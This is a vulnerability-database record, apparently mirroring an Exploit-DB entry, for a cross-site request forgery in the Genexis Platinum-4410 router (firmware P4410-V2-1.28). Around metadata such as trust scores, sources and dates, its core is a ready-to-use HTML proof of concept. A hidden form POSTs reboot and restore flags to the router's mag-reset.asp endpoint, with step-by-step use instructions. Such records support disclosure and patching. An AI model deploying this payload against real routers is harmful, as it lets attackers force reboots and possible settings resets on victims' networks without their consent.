ID

VAR-E-202010-0039


EDB ID

48972


TITLE

Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 48972

DESCRIPTION

Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 48972

AFFECTED PRODUCTS

vendor:genexismodel:platinum-4410 p4410-v2-1.28scope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 48972 // EDBNET: 103478

EXPLOIT

# Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Cross Site Request Forgery to Reboot
# Date: 10/28/2020
# Exploit Author: Mohammed Farhan
# Vendor Homepage: https://genexis.co.in/product/ont/
# Version: Platinum-4410 Software version - P4410-V2-1.28
# Tested on: Windows 10
# Author Contact: https://twitter.com/farhankn

Vulnerability Details
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Login to the application
Create an HTML file using the below mentioned code

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action=3D"http://192.168.1.1/cgi-bin/mag-reset.asp" method=3D"POS=
T">
<input type=3D"hidden" name=3D"rebootflag" value=3D"1" />
<input type=3D"hidden" name=3D"restoreFlag" value=3D"1" />
<input type=3D"hidden" name=3D"isCUCSupport" value=3D"0" />
<input type=3D"submit" value=3D"Submit request" />
</form>
</body>
</html>

Open the HTML page in the browser and Click on "Submit Request"
Note that modem reboots after the same

Trust: 1.0

sources: EXPLOIT-DB: 48972

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 48972

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 48972

TYPE

Cross Site Request Forgery to Reboot

Trust: 1.6

sources: EXPLOIT-DB: 48972 // EDBNET: 103478

CREDITS

Mohammed Farhan

Trust: 0.6

sources: EXPLOIT-DB: 48972

EXTERNAL IDS

db:EXPLOIT-DBid:48972

Trust: 1.6

db:EDBNETid:103478

Trust: 0.6

sources: EXPLOIT-DB: 48972 // EDBNET: 103478

REFERENCES

url:https://www.exploit-db.com/exploits/48972/

Trust: 0.6

sources: EDBNET: 103478

SOURCES

db:EXPLOIT-DBid:48972
db:EDBNETid:103478

LAST UPDATE DATE

2022-07-27T09:46:50.872000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:48972date:2020-10-29T00:00:00
db:EDBNETid:103478date:2020-10-29T00:00:00